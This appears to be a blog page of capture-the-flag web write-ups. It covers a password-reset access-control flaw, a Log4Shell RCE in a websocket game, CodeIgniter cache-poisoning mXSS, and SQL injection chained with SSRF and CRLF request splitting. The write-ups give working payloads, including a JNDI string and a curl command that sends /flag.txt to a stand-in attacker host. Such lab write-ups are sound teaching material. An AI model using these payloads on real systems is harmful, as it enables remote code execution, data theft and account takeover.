    username = session['username']

    if image_id == 'ben10' and not username.startswith('admin'):
        return redirect(url_for('missing_permissions'))

    flag = None
    if username.startswith('admin') and image_id == 'ben10':
        flag = FLAG

    return render_template('image_viewer.html', image_name=image_id, flag=flag)
```

## Code review
1. `/register` endpoint
For every user, an admin account is created. For example, when registering as `sebb`, an admin account `admin^sebb^bec9e48356` is created with a random password.
The admin account's username can be found in the `/home` page: `<div style="display:none;" id="admin_data">{{ admin_username }}</div>`

```python
@app.route('/register', methods=['GET', 'POST'])
def register():
    """Handle user registration."""
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']

        if username.startswith('admin') or '^' in username:
            flash("I don't like admins", "error")
            return render_template('register.html')

        if not username or not password:
            flash("Both fields are required.", "error")
            return render_template('register.html')

        admin_username = f"admin^{username}^{secrets.token_hex(5)}"
        admin_password = secrets.token_hex(8)

        try:
            conn = sqlite3.connect(DATABASE)
            cursor = conn.cursor()
            cursor.execute("INSERT INTO users (username, password, admin_username) VALUES (?, ?, ?)",
                           (username, password, admin_username))
            cursor.execute("INSERT INTO users (username, password, admin_username) VALUES (?, ?, ?)",
                           (admin_username, admin_password, None))
            conn.commit()
        except sqlite3.IntegrityError:
            flash("Username already exists!", "error")
            return render_template('register.html')
        finally:
            conn.close()

        flash("Registration successful!", "success")
        return redirect(url_for('login'))

    return render_template('register.html')
```

1. `/reset_password`
Returns a token that can be used for resetting the password via `/forgot_password`

```python
@app.route('/reset_password', methods=['GET', 'POST'])
def reset_password():
    """Handle reset password request."""
    if request.method == 'POST':
        username = request.form['username']

        if username.startswith('admin'):
            flash("Admin users cannot request a reset token.", "error")
            return render_template('reset_password.html')

        if not get_user_by_username(username):
            flash("Username not found.", "error")
            return render_template('reset_password.html')

        reset_token = secrets.token_urlsafe(16)
        update_reset_token(username, reset_token)

        flash("Reset token generated!", "success")
        return render_template('reset_password.html', reset_token=reset_token)

    return render_template('reset_password.html')
```

1. `/forgot_password`
This code handles password resets. It retrieves the username, reset token, and new password from user input. For non-admin users, it verifies the reset token and updates the password if valid. For admin users, it extracts the non-admin username, verifies the token, and then updates the **admin** account's password.
This is clearly an authentication flaw.

```python
@app.route('/forgot_password', methods=['GET', 'POST'])
def forgot_password():
    """Handle password reset."""
    if request.method == 'POST':
        username = request.form['username']
        reset_token = request.form['reset_token']
        new_password = request.form['new_password']
        confirm_password = request.form['confirm_password']

        if new_password != confirm_password:
            flash("Passwords do not match.", "error")
            return render_template('forgot_password.html', reset_token=reset_token)

        user = get_user_by_username(username)
        if not user:
            flash("User not found.", "error")
            return render_template('forgot_password.html', reset_token=reset_token)

        if not username.startswith('admin'):
            token = get_reset_token_for_user(username)
            if token and token[0] == reset_token:
                update_password(username, new_password)
                flash(f"Password reset successfully.", "success")
                return redirect(url_for('login'))
            else:
                flash("Invalid reset token for user.", "error")
        else:
            username = username.split('^')[1]
            token = get_reset_token_for_user(username)
            if token and token[0] == reset_token:
                update_password(request.form['username'], new_password)
                flash(f"Password reset successfully.", "success")
                return redirect(url_for('login'))
            else:
                flash("Invalid reset token for user.", "error")

    return render_template('forgot_password.html', reset_token=request.args.get('token'))
```

## Exploitation
1. Register an user and request a password reset
2. Reset the password using the admin username
3. Login as admin
4. Visit `/image/ben10`

`srdnlen{b3n_l0v3s_br0k3n_4cc355_c0ntr0l_vulns}`

# Sparkling Sky
#log4j 
## Description
> I am developing a game with websockets in python. I left my pc to a java fan, I think he really messed up.
> _It is forbidden to perform or attempt to perform any action against the infrastructure or the challenge itself._
- username: user1337
- password: user1337
- website: [http://sparklingsky.challs.srdnlen.it:8081](http://sparklingsky.challs.srdnlen.it:8081)
author: @sanmatte
## Overview
It's a simple game.
## Road to flag
The flag is in `/flag.txt` -> RCE
## Code review
1. `Dockerfile`
The app uses log4j 2.14.1, vulnerable to CVE-2021-44228

```
RUN cd $(python -c "import os, pyspark; print(os.path.dirname(pyspark.__file__))")/jars && \
    rm log4j* && \
    wget https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.14.1/log4j-core-2.14.1.jar && \
    wget https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-api/2.14.1/log4j-api-2.14.1.jar && \
    wget https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-slf4j-impl/2.14.1/log4j-slf4j-impl-2.14.1.jar && \
    wget https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-1.2-api/2.14.1/log4j-1.2-api-2.14.1.jar
```
1. `socket.py`
The games uses websockets for client-server communication.
Every move is analyzed by `analyze_movement` and 'fraudulent' moves are logged with **log4j**.
The $x$,$y$ coordinates and the *angle* of the move are included in the logs. $x$ and $y$ has to be **numbers** because `analyze_movement` uses them to compute the distance, instead **angle** can be a **string**.

```python
@socketio.on('move_bird')
    @login_required
    def handle_bird_movement(data):
        user_id = data.get('user_id')
        print(f"{user_id} moves")
        if user_id in players:
            # for p in players:
                # print(f"player: {p}")
            del data['user_id']
            if players[user_id] != data:
                with lock:
                    players[user_id] = {
                        'x': data['x'],
                        'y': data['y'],
                        'color': 'black',
                        'angle': data.get('angle', 0)
                    }
                    # print("data: " + str(data.get('angle', 0)))
                    if analyze_movement(user_id, data['x'], data['y'], data.get('angle', 0)):
                        log_action(user_id, f"was cheating with final position ({data['x']}, {data['y']}) and final angle: {data['angle']}")
                        # del players[user_id] # Remove the player from the game - we are in beta so idc
                    emit('update_bird_positions', players, broadcast=True)
```
1. `anticheat.py`
Decides if a move is valid or not relying on the distance and time between the moves.

```python
logger = spark._jvm.org.apache.log4j.LogManager.getLogger("Anticheat")

def log_action(user_id, action):
    logger.info(f"User: {user_id} - {action}")

def analyze_movement(user_id, new_x, new_y, new_angle):
    global user_states
    # Initialize user state if not present
    if user_id not in user_states:
        user_states[user_id] = {
            'last_x': new_x,
            'last_y': new_y,
            'last_time': time.time(),
            'violations': 0,
        }

    user_state = user_states[user_id]
    last_x = user_state['last_x']
    last_y = user_state['last_y']
    last_time = user_state['last_time']

    # Calculate distance and time elapsed
    distance = math.sqrt((new_x - last_x)**2 + (new_y - last_y)**2)
    time_elapsed = time.time() - last_time
    speed = distance / time_elapsed if time_elapsed > 0 else 0

    # Check for speed violations
    if speed > MAX_SPEED:
        return True

    # Update the user state
    user_states[user_id].update({
        'last_x': new_x,
        'last_y': new_y,
        'last_time': time.time(),
    })

    return False
```

## Exploitation
1. Login
2. log4j RCE
To achieve RCE I have just to make the application log a malicious message, by making an invalid move that will be logged by the `move_bird` websocket handler.
I can insert the log4shell payload in the **angle** parameter that will be logged triggering the RCE.
To make the invalid move i can just paste this code in the web console of the page:

```js
socket.emit('move_bird', {user_id: 1, x:1, y:1, angle:0});
socket.emit('move_bird', {user_id: 1, x:999999999999999, y:999999999999999, angle:'${jndi:ldap://ATTACKER:1389/ftbqdx}'});
```

An JNDI/LDAP server is required for the exploitation of CVE-2021-44228, i used [JNDI-Injection-Exploit](https://github.com/welk1n/JNDI-Injection-Exploit)
`java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "curl -F x=@/flag.txt https://ATTACKER.com/" -A "ATTACKER"`

- Profit
`srdnlen{I_th1nk_h3_r34lly_m3ss3d_up}`

Srdnlen25 - All Web Writeups

# Intigriti XSS Challenge #1224

> Challenge URL https://challenge-1224.intigriti.io/
## Overview
It is a simple page that renders a text, made in `php` + `CodeIgniter`.
## Code review
1. Main logic:
	- The `View` controller handles an HTTP request, retrieves the `title` parameter from the GET request, cleans it from potential security threats, converts it to an ID using the `str2id()` function, and then loads a view with the sanitized title and its corresponding ID.
	- The output view is cached for one minute.
	- The `str2id()` function ensures that a string is suitable for use as an HTML ID by converting it to lowercase (except for the first letter), and replacing spaces with dashes.
```php
<?php

function str2id($str)
{
    if (strstr($str, '"')) {
        die('Error: No quotes allowed in attribute');
    }
    // Lowercase everything except first letters
    $str = preg_replace_callback('/(^)?[A-Z]+/', function($match) {
        return isset($match[1]) ? $match[0] : strtolower($match[0]);
    }, $str);
    // Replace whitespace with dash
    return preg_replace('/[\s]/', '-', $str);
}

class View extends CI_Controller
{
    public function index()
    {
        $this->load->helper('string');
        $this->load->helper('security');
        $this->output->cache(1);

        $title = $this->input->get('title') ?: 'Christmas Fireplace';

        $title = xss_clean($title);
        $id = str2id($title);

        $this->load->view('view', array(
            "id" => $id,
            "title" => $title
        ));
    }
}
```
- Then the sanitized input is inserted in two parts of the page:
```php
<h1><?= htmlspecialchars($title) ?></h1>
[...]
<div class="fireplace" id="<?= $id ?>">
```

Overall the code looks secure, so let's look at how is the cache handled:

- cache write: if a page hasn't been cached yet, a cache file is written locally right before the response is sent to the client
```php
public function _write_cache($output)
{
	[...]
	
	$expire = time() + ($this->cache_expiration * 60);
	// Put together our serialized info.
	$cache_info = serialize(array(
		'expire'	=> $expire,
		'headers'	=> $this->headers
	));
	$output = $cache_info.'ENDCI--->'.$output;

	[...]
}
```

A cache file is composed like this:
```
SERIALIZED_OBJECT + 'ENDCI--->' + HTML_PAGE
```

- cache read: when requesting a cached page, the corresponding cache file is read and split in two parts:
	- the first part is a PHP object containing the document's expiry value
	- the rest is the page that will be sent to the client
```php
public function _display_cache(&$CFG, &$URI)
{
	[...]

	$cache = (filesize($filepath) > 0) ? fread($fp, filesize($filepath)) : '';

	flock($fp, LOCK_UN);
	fclose($fp);

	// Look for embedded serialized file info.
	if ( ! preg_match('/^(.*)ENDCI--->/', $cache, $match))
	{
		return FALSE;
	}

	$cache_info = unserialize($match[1]);
	$expire = $cache_info['expire'];

	$last_modified = filemtime($filepath);
	
	[...]
	
	// Display the cache
	$this->_display(self::substr($cache, self::strlen($match[0])));
}
```

## Exploitation
1. **Cache poisoning**

What happens if I smuggle a `ENDCI--->` into the cache file?

The cache file would look like this:
```
SERIALIZED_OBJECT + 'ENDCI--->' + START_HTML_PAGE + 'ENDCI--->' + END_HTML_PAGE
```
Therefore when requesting the cached page, because of the regex `/^(.*)ENDCI--->/`, the server will return only the part of the page **after the last** `ENDCI--->`, 

for example:
- Non cached response:
```
[...]<div class="fireplace" id="ENDCI--->xss"><div class="bottom"><ul class="ground">[...]
```
- Cached response:
```
xss"><div class="bottom"><ul class="ground">[...]
```

In the **cached** response, the input is reflected directly in the **html context** (not in the attribute like before), this could introduce an XSS vulnerability.


But there's a problem: sending directly `ENDCI--->`  **won't poison** the cache because `xss_clean` will recognize it as an html comment and will encode it.

Fortunately `str2id` converts spacing characters into dashes, I can use this behaviour to bypass `xss_clean`.

By sending `title=ENDCI--%20>`, no malicious input is detected and `ENDCI--->` gets injected into the page.


2. **mXSS**

Now that I can inject HTML outside the attribute context, I have to bypass some obstacles in order to have an XSS:
- `xss_clean` removes dangerous elements and attributes
- `str2id`  converts spaces to dashes, and all uppercase chars to lowercase

After some attempts I came up with the following payload:
`ENDCI-- ><p/title='</noscript><iframe/onload=alert(document.domain)>'>`

Why does this work? 

This is a **Mutation-based XSS (mXSS)**.

The reason this payload bypasses the `xss_clean` function is that **it does not check attribute values** for potential XSS risks, focusing instead on element tags and known dangerous attributes. As a result, it fails to flag this payload as dangerous so it doesn't get sanitized.
However, when the browser processes this malformed HTML, it **misinterprets** the structure and "corrects" it in a way that turns it into a valid executable script. This misinterpretation leads to a cross-site scripting vulnerability, where the injected script gets executed by the browser.

## Full exploit
1. **Poison the cache**: Request the following URL at 1-minute intervals to poison the cache, as it expires after 1 minute: `https://challenge-1224.intigriti.io/index.php/view?title=ENDCI--%20%3E%3Cp/title=%27%3C/noscript%3E%3Ciframe/onload=alert(document.domain)%3E%27%3E`
2. **Trigger the XSS**: Once the cache is poisoned, accessing the link will trigger the XSS payload.

Intigriti XSS - Fireplace generator

# m0le24 - ndayFilestorage
## Description
S3, min.io, uploadthing... Why do we have to complicate our platforms with all of these when we have some good old well-tested solutions?
## Overview
It's a file hosting website composed by 2 services:
- app: The main web application service that handles file uploads and downloads
- ftp: A service running both an FTP server and an HTTP server used for account management
## Road to flag
The flag is returned by the webserver running in the 'ftp' service when making a POST request with a specific header:
```js
app.post("/flag", (req, res) => {
  if (!!req.headers["x-get-flag"]) {
    res.send(process.env.FLAG || "ptm{REDACTED}");
  } else {
    req.send("nope");
  }
});
```
## Code review
1. SQL Injection

A SQL injection exists in the `upload_file` function. The `$filename` parameter is directly inserted into the SQL query without any sanitization or parameterization:
```php
$stmt = $database->prepare("INSERT INTO files (owner, filename, size) VALUES (:owner, '$filename', :size)");
```
This allows an attacker to inject arbitrary SQL code through the filename.

2. Server-Side Request Forgery (SSRF)

The application creates an FTP context using user-controlled settings:
```php
$opts = ['ftp' => $_SESSION['settings']];
$context = stream_context_create($opts);
```

These settings can be manipulated by sending a POST request to '/' with JSON data:
```php
$data = json_decode($_POST['settings'], true);
if (!is_array($data)) {
\tdie;
}
$_SESSION['settings'] = $data;
```

By setting the [FTP context options](https://www.php.net/manual/en/context.ftp.php), we can redirect file requests to the FTP service:
```
{"proxy":"ftp:3000"}
```

When downloading a file, the application sends a request like:
```
GET ftp://username:password@ftp/filename HTTP/1.1
Authorization: Basic Mjg0OTJhNTQzYTMwYzdjODoyOTU3ZjJlZTUzYWM3MGQ5
Host: ftp
Connection: close
```
To obtain the flag, we need to convert this to a POST request and add the required `x-get-flag` header.

3. CRLF Injection Leading to HTTP Request Splitting

In the `upload_file` function, filenames are not properly sanitized before being used in URLs:
```php
$ftp = @fopen("ftp://{$_SESSION['user']}:{$_SESSION['password']}@ftp/$filename", 'w', false, $context);
```

Local testing reveals that fopen is vulnerable to CRLF injection. For example, using:
`$filename = 'flag%20HTTP%2f1.1%0d%0aHost%3a%20ftp%0d%0a%0d%0aPOST%20%2fflag%20HTTP%2f1.1%0d%0aX-Get-Flag%3a%201%0d%0aX%3a%20'`

Generates this request:
```
GET ftp://dcc24aaf6ff28e53:91ce935517f3c9ec@ftp/flag HTTP/1.1
Host: ftp

POST /flag HTTP/1.1
X-Get-Flag: 1
X:  HTTP/1.1
Authorization: Basic ZGNjMjRhYWY2ZmYyOGU1Mzo5MWNlOTM1NTE3ZjNjOWVj
Host: ftp
Connection: close
```

However, there's a catch - filenames containing CRLF characters cannot be directly used because the application verifies file existence in the database:
```php
$filename = $_GET['filename'];

$stmt = $database->prepare('SELECT * FROM files WHERE owner = :owner AND filename = :filename');
$stmt->execute([
\t'owner' => $_SESSION['user'],
\t'filename' => $filename
]);
$file = $stmt->fetch();

if (!$file) {
\tdie('<script>window.close()</script>');
}
```
## Exploitation Steps
1. First, exploit the SQL injection to create a file with a specially crafted name that includes our CRLF payload:
`none',1),(:owner,cast(X'666c616720485454502f312e310d0a486f73743a206674700d0a0d0a504f5354202f666c616720485454502f312e310d0a582d4765742d466c61673a20310d0a583a20' as text),:size);--`

This SQL injection creates a file entry where the name is our hex-encoded CRLF payload. The hex string is decoded when inserted into the database.

2. Configure the FTP proxy settings to redirect requests:
```
{"proxy":"ftp:3000"}
```

3. Finally, trigger the exploit by requesting:
```
GET /?filename=flag%20HTTP%2f1.1%0d%0aHost%3a%20ftp%0d%0a%0d%0aPOST%20%2fflag%20HTTP%2f1.1%0d%0aX-Get-Flag%3a%201%0d%0aX%3a%20
```

`ptm{php_why_d0_y0u_hav3_t0_b3_l1k3_th1s..._--_....}`

BLOG

Categories

Tags